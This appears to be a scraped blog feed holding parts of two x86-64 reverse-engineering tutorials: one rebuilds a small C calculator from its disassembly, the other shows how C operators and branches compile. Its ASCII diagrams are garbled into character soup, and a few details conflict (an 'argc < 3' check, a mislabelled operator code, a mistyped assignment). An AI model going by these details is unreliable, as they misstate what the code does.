PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx pop rbp ret The first three lines are simply the function\u0026rsquo;s label and prologue.\nThen there are two mov statements (lines 4 and 5) that involve edi (first argument) and esi (second argument) (second argument). They are the function arguments passed from the calling function to this function. These values are then saved in the [rbp-4] and [rbp-8] local variables.\nGiven the variable size requirements (4 bytes each), it is safe to assume that the passed variables are of the int type. That is, we are passing this function two int values.\nThen, at lines 6, 7, and 8, we simply load the values from the variables into some registers and then add them up. In this case, the result of the add instruction will be stored in the eax register. Remember, this is also the register where the return value of a function is stored. So when we return back from this function, we have our addition result in the eax register.\nFinally, at line 9 \u0026amp; 10, we make a graceful return from the function.\nSimilar behaviour is followed by next 3 functions - subFunc, mulFunc and divFunc.\nsubFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform subtraction mov eax, DWORD PTR [rbp-4] sub eax, DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret mulFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform multiplication mov eax, DWORD PTR [rbp-4] imul eax, DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret divFunc: ; Prologue push rbp mov rbp, rsp ; Function arguments mov DWORD PTR [rbp-4], edi mov DWORD PTR [rbp-8], esi ; Load values and perform division mov eax, DWORD PTR [rbp-4] cdq idiv DWORD PTR [rbp-8] ; Return value is already in EAX, just return pop rbp ret Now we are done with all the functions that perform the computations, next comes the function which prints the help message and then exits.\n.LC0: .string \u0026#34;Not enough arguments passed\u0026#34; .LC1: .string \u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026#34; die: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 call puts mov edi, OFFSET FLAT:.LC1 call puts mov edi, 1 call exit The name implies that the purpose of this function is to terminate the execution of the calc program. Lines 8-9 show that this function is printing something using the puts function. The function\u0026rsquo;s argument is a string starting at offset .LC0 - \u0026quot;Insufficient arguments passed\u0026quot;. Lines 9-10 contain another call for puts with an argument from offset .LC1 - \u0026quot;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\u0026quot;.\nThese both puts statements combined give the error message we got when we tried to execute the program without any arguments.\nFinally, it terminates with an exit function call (no return), and the function\u0026rsquo;s argument was the integer value 1. Typically, the return value for successful execution is zero, and all non-zero values denote some type of execution error. So exiting with 1 indicates an error.\nNow we know what each function do at atomic level. Let\u0026rsquo;s load our big guns and take a shot at main() function.\n.LC2: .string \u0026#34;%d %c %d = %d\\n\u0026#34; main: push rbp mov rbp, rsp sub rsp, 48 mov DWORD PTR [rbp-36], edi mov QWORD PTR [rbp-48], rsi cmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die .L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-12], eax mov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax mov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al movsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop .L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret The main function still appears to be too large to handle all at once, so I\u0026rsquo;ll cut it into smaller chunks to bite off and digest properly.\nThe prologue comes first\u0026hellip; setting up the function frame; nothing new here.\nmain: push rbp mov rbp, rsp Then we make some space in the frame to store the local variables.\nsub rsp, 48 And then storing edi and rsi values in there. If you remember these two registers indicate the first two arguments passed to a function. In this case, the arguments to main function will be the argc and argv.\nargc \u0026ndash;\u0026gt; Count of the cli arguments passed to it. argv \u0026ndash;\u0026gt; Pointer to the list of arguments passed. Next up is the comparision\u0026hellip;which will check the count of args. This decides the branch the program execution takes - die or live.\ncmp DWORD PTR [rbp-36], 3 jg .L11 mov eax, 0 call die This compares [rbp-36] (argc) with hardcoded value of 3. If the value from argc is greater than 3 then it\u0026rsquo;ll make a jump to .L11, otherwise it\u0026rsquo;ll call die function\u0026hellip; which will print some messages and then exit with status 1. We already looked at that.\nSo if we write a C program for what we know about main till now, we\u0026rsquo;ll get something like:\nvoid main(int argc, char* argv[]) { if (argc \u0026lt; 3) { die(); } else { /* Keep on going to know more */ } } Next statements are something new, so you\u0026rsquo;ll have to believe me when I say that this is equivalent to argv[1].\n.L11: mov rax, QWORD PTR [rbp-48] add rax, 8 mov rax, QWORD PTR [rax] Before I start explaining, take a look at this diagram.\nr a x ┌ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► r b p - 4 8 ┌ │ ├ │ ├ │ ├ │ ├ │ ├ │ │ │ │ │ ├ │ ├ │ ├ │ ├ │ ├ │ │ │ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ s ─ ─ ─ ─ p ─ ─ ─ ─ ─ ─ ─ o ─ ─ ─ ─ t ─ p ─ p ─ p ─ ─ ─ ─ m ─ ─ ─ ─ r ─ t ─ t ─ t ─ ─ ─ ─ e ─ ─ ─ ─ _ ─ r ─ r ─ r ─ ─ ─ ─ _ ─ ─ ─ ─ t ─ _ ─ _ ─ _ ─ ─ ─ ─ p ─ ─ ─ ─ o ─ t ─ t ─ t ─ ─ ─ ─ o ─ ─ ─ ─ _ ─ o ─ o ─ o ─ ─ ─ ─ i ─ ─ ─ ─ p ─ _ ─ _ ─ + ─ ─ ─ ─ n ─ ─ ─ ─ r ─ a ─ a ─ a ─ ─ ─ ─ t ─ ─ ─ ─ o ─ r ─ r ─ r ─ ─ ─ ─ e ─ ─ ─ ─ g ─ g ─ g ─ g ─ ─ ─ ─ r ─ ─ ─ ─ _ ─ 1 ─ 2 ─ 3 ─ ─ ─ ─ _ ─ ─ ─ ─ n ─ ─ ─ ─ ─ ─ ─ v ─ ─ ─ ─ a ─ ─ ─ ─ ─ ─ ─ a ─ ─ ─ ─ m ─ ─ ─ ─ ─ ─ ─ l ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ u ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ ┤ │ ┤ │ ┤ │ ┤ │ ┤ │ │ │ │ │ ┤ │ ┤ │ ┤ │ ┤ │ ┤ │ │ │ ─ s s s s ─ o o o o ─ m m m m ─ e e e e ─ _ _ _ _ ─ p p p p ─ o o o o ─ i i i i ─ n n n n ┐ │ │ │ │ │ │ │ │ │ ▼ t t t t e e e e r r r r _ _ _ _ v v v v a a a a l l l l u u u u e e e e + + + 8 1 2 6 4 Now with this in your mind, we can start to understand the above 3 instructions.\nmov rax, QWORD PTR [rbp-48] This instruction loads the some_pointer_value into rax register.\nadd rax, 8 This adds up 8 to rax value. That means now the resultant value is some_pointer_value + 8. If you don\u0026rsquo;t know it already, 8 is the size of a pointer on most x86_64 machines. So if we want to add for 2 pointers, we\u0026rsquo;ll need something like some_pointer_value + 16.\nmov rax, QWORD PTR [rax] Now we load the value from that location. In C language, this would be equivalent to *(argv + 1) or argv[1] or if you are feeling funny 1[argv]. HOW?? 1\nNow, next instruction calls atoi function with the argv[1] as it\u0026rsquo;s first argument.\nmov rdi, rax call atoi atoi function changes character value to respective integer value. As an example, '1' (in char) will be converted to 1 (in int).\nmov DWORD PTR [rbp-12], eax And then whatever is returned by that function will be stored in a local variable pointed by rbp-12. Remember, eax register is used to store the return values from called functions (atio) to caller function (main).\nNext set of instructions is quite similar to what we just saw.\nmov rax, QWORD PTR [rbp-48] add rax, 24 mov rax, QWORD PTR [rax] mov rdi, rax call atoi mov DWORD PTR [rbp-16], eax If you notice, here we are adding 24(8 * 3 = 24) so that means arg3 is being used - argv[3]. Till this point we have successfully converted argv[1] and argv[3] to integers. These are the number1 and number2 values for our litte calculator.\nNow argv[2]\u0026hellip; our operator character\u0026hellip; 1 byte value.\nmov rax, QWORD PTR [rbp-48] add rax, 16 mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] mov BYTE PTR [rbp-17], al This adds 16 - means argv[2]. So we load the value and then just pick up the lowest 1 byte value al from the whole thing and store it in [rbp-17] location.\nLet\u0026rsquo;s update our C program with the new findings.\nvoid main(int argc, char* argv[]) { if (argc \u0026lt; 3) { die(); } else { int num1 = atoi(argv[1]); int num2 = atoi(argv[3]); char op = argv[2]; /* Keep on going to know more */ } } Next few lines of disassembly code looks like a conditional branch\u0026hellip;. So many \u0026ldquo;compare and jump\u0026rdquo; instructions.\nmovsx eax, BYTE PTR [rbp-17] cmp eax, 47 je .L12 cmp eax, 47 jg .L13 cmp eax, 45 je .L14 cmp eax, 45 jg .L13 cmp eax, 42 je .L15 cmp eax, 43 jne .L13 mov QWORD PTR [rbp-8], OFFSET FLAT:addFunc jmp .L13 .L14: mov QWORD PTR [rbp-8], OFFSET FLAT:subFunc jmp .L13 .L15: mov QWORD PTR [rbp-8], OFFSET FLAT:mulFunc jmp .L13 .L12: mov QWORD PTR [rbp-8], OFFSET FLAT:divFunc nop The value being compared is stored in [rbp-17] in this case. This contains the operator character from argv[2]. If you convert the values this is compared to to char equivalents, you\u0026rsquo;ll get the following:\n47 is /, 45 is -, 42 is *, and 43 is +. With some calculations, you can conclude where the control will jump. To sum up,\nif the operator is 47 (/), then it\u0026rsquo;ll jump to .L12. Which will move the offset location for divFunc function to a local variable.\nif the operator is 45 (-), then it\u0026rsquo;ll move offset location for subFunc function to that local variable.\nif the operator is 42 (*), then it\u0026rsquo;ll move offset location for mulFunc function to that local variable.\nif the operator is 42 (+), then it\u0026rsquo;ll move offset location for addFunc function to that local variable.\nIn any other given input, it\u0026rsquo;ll simply move forward to .L13.\n.L13: mov edx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov rcx, QWORD PTR [rbp-8] mov esi, edx mov edi, eax call rcx mov esi, eax movsx edx, BYTE PTR [rbp-17] mov ecx, DWORD PTR [rbp-16] mov eax, DWORD PTR [rbp-12] mov r8d, esi mov esi, eax mov edi, OFFSET FLAT:.LC2 mov eax, 0 call printf nop leave ret Before reaching .L13, we have 4 variables in our program:-\nnumber1 - stored at [rbp-12] number2 - stored at [rbp-16] operator - stored at [rbp-17] pointer to the function which is selected on the basis of operator. This is stored at [rbp-8]. Now that we\u0026rsquo;re in .L13,\nWe assign the number1, number2, and the function pointer to eax, edx, and rcx, respectively. The function is then called with the arguments number1 and number2. Finally, the outcome is saved.\nThe remainder of the .L13 consists entirely of calling a printf function with a format string and other local variables. The final result will look like this: \u0026lt;number1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;number2\u0026gt; = \u0026lt;result_from_function\u0026gt;. I\u0026rsquo;ll leave it to you to dissect and solve the final puzzle piece. After printing, the function then exits gracefully.\nNow we can put everything together, and the complete code should look something like this.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; // Function to perform addition int addFunc(int a, int b) { return a + b; } // Function to perform subtraction int subFunc(int a, int b) { return a - b; } // Function to perform multiplication int mulFunc(int a, int b) { return a * b; } // Function to perform division int divFunc(int a, int b) { return a / b; } // Function to print usage message and exit void die() { printf(\u0026#34;Not enough arguments passed\\n\u0026#34;); printf(\u0026#34;Usage: ./calc \u0026lt;num1\u0026gt; \u0026lt;operator\u0026gt; \u0026lt;num2\u0026gt;\\n\u0026#34;); exit(1); } // main function void main(int argc, char *argv[]) { if(argc \u0026lt; 4) die(); int x = atoi(argv[1]); int y = atoi(argv[3]); char option = *argv[2]; int (*fp) (int, int); switch(option) { case \u0026#39;+\u0026#39;: { fp = addFunc; break; } case \u0026#39;-\u0026#39;: { fp = subFunc; break; } case \u0026#39;*\u0026#39;: { fp = mulFunc; break; } case \u0026#39;/\u0026#39;: { fp = divFunc; break; } } printf(\u0026#34;%d %c %d = %d\\n\u0026#34;, x, option, y, fp(x,y)); } This may not be what the original developer wrote, but it will certainly behave the same. That is the entire point of reverse engineering. Dissecting something with your tools to understand how it behaves and then creating something that mimics the behavior.\nI\u0026rsquo;ll encourage you to go and try to reverse engineer some more binaries. You can build your own if you want or just download some from online platforms like crackme.one. Have fun!!\nhttps://stackoverflow.com/questions/381542/with-arrays-why-is-it-the-case-that-a5-5a\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/04/intro-to-re-simple-calculator/","summary":"We covered a wide range of topics in earlier articles that were helpful in comprehending how many lower-level processes operate. This blog will concentrate on applying those ideas to recreate C program after reverse engineering a simple calculator binary.\nIt is always a good idea to observe how the target software responds to various inputs. This gives you a sense of the internal logic that might be operating.\nIf we run this program without any arguments, we will get an error message stating that we need to pass more arguments as well as the usage guide is printed.","title":"Intro to RE: C : A Simple Calculator"},{"content":"In the previous blog, I discussed some of the basic C program\u0026rsquo;s disassembly structures, concentrating on the variables and their memory layouts. This article, a follow-up to the previous one, focuses on basic operations and functions in C programs.\nIn the previous blogs, we have seen what an empty C program looks like\nvoid main() {} Disassembly:\nmain: push rbp mov rbp, rsp nop pop rbp ret Arithmatic operators Now if we want to work with operations, we\u0026rsquo;ll have to add 2 local variables to the function. Something like in the below example.\nvoid main() { int a=1, b=2; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 nop pop rbp ret Addition Now let\u0026rsquo;s perform add operation on the 2 local variables we created and save the result in a new variable.\nvoid main() { int a=1, b=2; int c = a + b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov edx, DWORD PTR [rbp-4] mov eax, DWORD PTR [rbp-8] add eax, edx mov DWORD PTR [rbp-12], eax nop pop rbp ret We can see a few new instructions in the disassembly code that are responsible for the int c = a + b instruction in the source code.\nWhen we look at them separately, it becomes quite natural to understand.\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov edx, DWORD PTR [rbp-4] ; Save the first variable value in EDX register mov eax, DWORD PTR [rbp-8] ; Save the second variable value in EAX register add eax, edx ; add EAX and EDX register values, this stores the result in EAX here mov DWORD PTR [rbp-12], eax ; Move the new value of EAX to third variable nop pop rbp ret Let\u0026rsquo;s look at other arithmetic operations as well\nSubtraction void main() { int a=1, b=2; int c = a - b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov eax, DWORD PTR [rbp-4] ; load first variable in EAX sub eax, DWORD PTR [rbp-8] ; subtract EAX with second variable, then save the result in EAX mov DWORD PTR [rbp-12], eax ; save the new value of EAX in the third register nop pop rbp ret Multiplication void main() { int a=1, b=2; int c = a * b; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov eax, DWORD PTR [rbp-4] ; load first variable imul eax, DWORD PTR [rbp-8] ; multiply it with second mov DWORD PTR [rbp-12], eax ; save it in the third nop pop rbp ret Division and modulo If you are not aware, the division operation is about calculating the quotient and the modulo operation is about the remainder.\nvoid main() { int a = 1, b = 2; int c = a / b; int d = a % b; } Disassembly:\nmain: ; prologue push rbp mov rbp, rsp ; first and second variable mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 ; division mov eax, DWORD PTR [rbp-4] ; Load first variable in EAX cdq ; Convert double to quad value; idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-12], eax ; Store new EAX value in third variable ; modulo mov eax, DWORD PTR [rbp-4] ; Load the first value again cdq ; Convert double to quad value; idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-16], edx ; Store the EDX value in fourth variable ; epilogue nop pop rbp ret If you didn\u0026rsquo;t notice, the division result was stored in the EAX register, while the modulo result was stored in the EDX\u0026hellip;Everything else stays unchanged.\nIts OKAY if you are having questions like-\nHow? why EDX?? WTF is going on??? Does it perform both operations even if either one of them is required???? These instructions, however, are not as simple to understand as others. So allow me to attempt to explain what\u0026rsquo;s going on.\nTo begin, you must comprehend the cdq instruction\u0026rsquo;s magic. This converts a Doubleword to a Quadword by extending the sign bit of EAX into the EDX register. For the purposes of this blog, consider the EAX and EDX to be joined together to form a large quadword register. So, if EDX contains 0x12 and EAX contains 0x3456789a, the resulting value is 0x123456789a. Does that make sense?\nSo when a idiv (or other div derivatives) operation is performed, both the quotient and the remainder are calculated. The instruction stores the quotient in EAX and the remainder in EDX register.\nNow that you understand the concept, you can think about removing some of the repeated instructions to make your program smaller and run faster.\nmain: ; prologue push rbp mov rbp, rsp ; first and second variable mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 ; division and modulo mov eax, DWORD PTR [rbp-4] ; Load first variable in EAX cdq ; Convert double to quad value; idiv DWORD PTR [rbp-8] ; perform idiv operation with second variable mov DWORD PTR [rbp-12], eax ; Store new EAX value in third variable (quotient) mov DWORD PTR [rbp-16], edx ; Store the EDX value in fourth variable (remainder) ; epilogue nop pop rbp ret Another point worth mentioning is that div operations cannot be used without overwriting the contents of the EAX and EDX registers. If you want to use the values of these registers after the div operation, save them somewhere else where they can be read later.\nIncrement/Decrement operators That\u0026rsquo;s all there is to arithmetic operators. Let\u0026rsquo;s move on to the increment and decrement operators\u0026hellip;\nvoid main() { int A = 5; int B = A++; int C = ++A; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 5; mov DWORD PTR [rbp-4], 5 ; int B = A++; mov eax, DWORD PTR [rbp-4] ; load the value from variable A in EAX lea edx, [rax+1] ; increment the value and store it in EDX mov DWORD PTR [rbp-4], edx ; update the incremented value in the variable A mov DWORD PTR [rbp-8], eax ; Load the old EAX value in variable B; ; int C = ++A; add DWORD PTR [rbp-4], 1 ; Increment the value of variable A mov eax, DWORD PTR [rbp-4] ; Load the updated value of variable A in EAX mov DWORD PTR [rbp-12], eax ; Store the EAX value in variable C ; epilogue nop pop rbp ret At this level, I believe you can see that this operator is nothing special. I\u0026rsquo;ll leave the decrement operator upto you to test and disect. You can always use godbolt.org 1 for quick testing.\nBitwise operators We can now proceed to examine the bitwise operators from a low-level perspective. (PS: They are my personal favourites)\nvoid main() { int A = 5, B = 0; int C1 = A \u0026amp; B; int C2 = A | B; int C3 = A ^ B; int C4 = ~ B; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 5, B = 0; mov DWORD PTR [rbp-4], 5 mov DWORD PTR [rbp-8], 0 ; int C1 = A \u0026amp; B; mov eax, DWORD PTR [rbp-4] and eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-12], eax ; int C1 = A | B; mov eax, DWORD PTR [rbp-4] or eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-16], eax ; int C1 = A ^ B; mov eax, DWORD PTR [rbp-4] xor eax, DWORD PTR [rbp-8] mov DWORD PTR [rbp-20], eax ; int C1 = ~ B; mov eax, DWORD PTR [rbp-8] not eax mov DWORD PTR [rbp-24], eax ; epilogue nop pop rbp ret Simple and neat. Aren\u0026rsquo;t they? Load the variables in registers, perform the operation, store the result.\nshift right/left operators Then there are shift operators - shift left and shift right.\nvoid main() { int A = 1; int B = A \u0026lt;\u0026lt; 4; int C = B \u0026gt;\u0026gt; 4; } Disassembly:-\nmain: ; prologue push rbp mov rbp, rsp ; int A = 1; mov DWORD PTR [rbp-4], 1 ; int B = A \u0026lt;\u0026lt; 4; mov eax, DWORD PTR [rbp-4] sal eax, 4 ; Shift arithmetic left mov DWORD PTR [rbp-8], eax ; int C = B \u0026gt;\u0026gt; 4; mov eax, DWORD PTR [rbp-8] sar eax, 4 ; Shift arithmetic right mov DWORD PTR [rbp-12], eax ; epilogue nop pop rbp ret If you look at their binary representation, shift operators are very straightforward. Allow me to create an image for you.\nInitial value in memory I V n a d l e u x e = = \u0026gt; \u0026gt; ┌ │ └ 7 ─ 0 ─ ┬ │ ┴ 6 ─ 0 ─ ┬ │ ┴ 5 ─ 0 ─ ┬ │ ┴ 4 ─ 0 ─ ┬ │ ┴ 3 ─ 0 ─ ┬ │ ┴ 2 ─ 0 ─ ┬ │ ┴ 1 ─ 0 ─ ┬ │ ┴ 0 ─ 1 ─ ┐ │ ┘ After shifting left 4 times. I V n a d l e u x e = = \u0026gt; \u0026gt; ┌ │ └ 7 ─ 0 ─ ┬ │ ┴ 6 ─ 0 ─ ◄ ┬ │ ┴ ─ 5 ─ 0 ─ ─ ┬ │ ┴ ─ 4 ─ 1 ─ ─ 4 ┬ │ ┴ ─ 3 ─ . ─ ─ 3 ┬ │ ┴ ─ 2 ─ . ─ ─ 2 ┬ │ ┴ ─ 1 ─ . ─ ─ 1 ┬ │ ┴ ─ 0 ─ . ─ ─ ┐ │ ┘ ─ ─ Blocks with \u0026ldquo;.\u0026rdquo; are the freshly shifted block from outside the memory frame. These blocks are packed with zeroes. This makes our resulting value 2^4 = 16.\nI V n a d l e u x e = = \u0026gt; \u0026gt; ┌ │ └ 7 ─ 0 ─ ┬ │ ┴ 6 ─ 0 ─ ┬ │ ┴ 5 ─ 0 ─ ┬ │ ┴ 4 ─ 1 ─ ┬ │ ┴ 3 ─ 0 ─ ┬ │ ┴ 2 ─ 0 ─ ┬ │ ┴ 1 ─ 0 ─ ┬ │ ┴ 0 ─ 0 ─ ┐ │ ┘ If we shift it right 4 times we\u0026rsquo;ll get our initial value.\nB A e f f t o I V e I V r n a r n a e d l : d l : e u e u x e x e = = = = \u0026gt; \u0026gt; \u0026gt; \u0026gt; ┌ │ └ ─ ┌ │ └ 7 ─ 0 ─ ─ 7 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 6 ─ 0 ─ ─ 6 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 5 ─ 0 ─ ─ 5 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 4 ─ 1 ─ ─ 4 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 3 ─ 0 ─ ─ 1 3 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 2 ─ 0 ─ ─ 2 2 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 1 ─ 0 ─ ─ 3 1 ─ 0 ─ ┬ │ ┴ ─ ┬ │ ┴ 0 ─ 0 ─ ─ 4 0 ─ 1 ─ ┐ │ ┘ ─ ┐ │ ┘ ► Consider this: if we conducted a shift right operation with this, the entire frame would be filled with 0s, and the resultant value would be zero. No matter how many shifts we make.\nAnother intriguing thing is that you can multiply a number by 2 using the shift left procedure\u0026hellip;without actually using the * operation.\nvoid main() { int a = 589; int X = a*2; int Y = a \u0026lt;\u0026lt; 1; } main: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 589 ; int X = a*2; mov eax, DWORD PTR [rbp-4] add eax, eax mov DWORD PTR [rbp-8], eax ; int Y = a \u0026lt;\u0026lt; 1; mov eax, DWORD PTR [rbp-4] add eax, eax mov DWORD PTR [rbp-12], eax nop pop rbp ret At a lower level, they are identical. Nothing particularly useful, but it\u0026rsquo;s good to know what\u0026rsquo;s happening behind the scenes.\nBranching Now comes the branching. Every good program employs branching for one reason or another. This is very useful to understand when considering reverse engineering.\nIf-else void main() { int a = 1; int x; if(a==2) x = 10; else x = 5; } Disassembly:\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 cmp DWORD PTR [rbp-4], 2 jne .L2 mov DWORD PTR [rbp-8], 10 jmp .L4 .L2: mov DWORD PTR [rbp-8], 5 .L4: nop pop rbp ret Let\u0026rsquo;s understand this step by step\nLine Description Line 1 label for the function starting Line 2:3 Prologue; Setting up the function frame Line 4 int a = 1; Line 5 Comparing this value with a hardcoded value 2 Line 6 If the result of the comparision is not equal, then jump to L2 flag Line 7 x = 10; This will run if it didn\u0026rsquo;t jump to L2 Line 8 Now jump to L4 Line 9 Flag for L2 Line 10 x = 5; Line 11:14 epilogue for the function Here is a graph to make it more simpler\n┌ │ │ │ └ ─ ─ ─ m j ─ ─ o m ─ ─ v p ─ ─ ─ ┌ │ ─ d . ─ ─ ─ w L ─ ┌ │ │ │ │ │ │ │ │ │ └ ─ ─ o 4 ─ │ └ ─ ─ ─ ─ r ─ ─ ─ p m m c j ─ ─ ─ d ─ ─ ─ u o o m n ─ ─ ─ ─ ─ ─ s v v p e ─ ─ ─ [ ─ ─ ─ h ─ ─ ─ r ─ ─ ─ r d d . ─ ─ ─ b ─ ─ ─ r b w w L ─ ─ ─ p ─ ─ ─ b p o o 2 ─ f │ │ ┘ ─ - ─ ─ ┌ │ │ │ │ │ └ ─ p , r r ─ ─ 0 ─ ─ ─ ─ ─ d d ─ ─ x ─ ─ ─ n p r ─ ─ r ─ ─ 8 ─ ─ ─ o o e ─ ─ s [ [ ─ ─ ] ─ ─ ─ p p t ─ ─ p r r ─ ─ , ─ ─ ─ ─ ─ b b ─ ─ ─ ─ ─ r ─ ─ p p ─ ─ 1 ─ ─ ─ b ─ ─ - - ─ ─ 0 ─ ─ ─ p ─ ─ 0 0 ─ t │ └ ─ ─ ┐ │ │ ─ ─ ─ x x ─ ─ ─ ─ ─ ─ ─ 4 4 ─ ─ ─ ─ ┌ │ ─ ─ ─ ] ] ─ ─ ─ ─ ─ ─ ─ ─ , , ─ ─ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 1 2 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ m ─ ─ ─ ─ ─ ─ ─ ─ o ─ ─ ─ ─ ─ ─ ─ ─ v ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ ─ d ─ ─ ─ ─ ─ ─ ─ w ─ ─ ─ ─ ─ ─ ─ o ─ │ │ ┘ ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ ─ d ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ [ ─ ─ ─ ─ ─ ─ r ─ ─ ─ ─ ─ ─ b ─ ─ ─ ─ ─ ─ p ─ ─ ─ ─ ─ ─ - ─ ─ ─ ─ ─ ─ 0 ─ ─ ─ ─ ─ ─ x ─ ┐ │ │ │ │ │ ┘ ─ ─ ─ 8 ─ ─ ─ ─ ] ─ ─ ─ ─ , ─ ─ ─ ─ ─ ─ ─ ─ 5 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ Switch-case Branching can also be implemented with switch-case directives in C and some other languages. At lower level, they function similarly to if-else.\nvoid main() { int a = 1; int x; switch(a){ case 1: { x = 10; break; } case 2: { x = 20; break; } } } Disassembly:-\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 ; Compare and jump if equal cmp DWORD PTR [rbp-4], 1 je .L2 ; Compare and jump if equal cmp DWORD PTR [rbp-4], 2 je .L3 ; Default jump to the end jmp .L4 .L2: mov DWORD PTR [rbp-8], 10 jmp .L4 .L3: mov DWORD PTR [rbp-8], 20 nop .L4: nop pop rbp ret See\u0026hellip;just like if-else statements, switch-case statements also use cmp and jmp instructions to create branches in the flow.\nGraph diagram for the above disassembly will look something like this\n┌ │ └ ─ ─ ─ j ─ ─ m ─ ┌ │ │ ─ p ─ │ │ │ └ ─ ─ ─ ─ ─ ─ . ─ ─ ─ ─ L ─ ─ ─ ─ 4 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ c j ─ ─ ─ ─ ─ ─ m e ─ ─ ─ ─ ─ ┌ │ │ │ │ │ └ ┌ │ ─ p ─ ─ ─ ─ ─ ─ ─ ─ ─ . 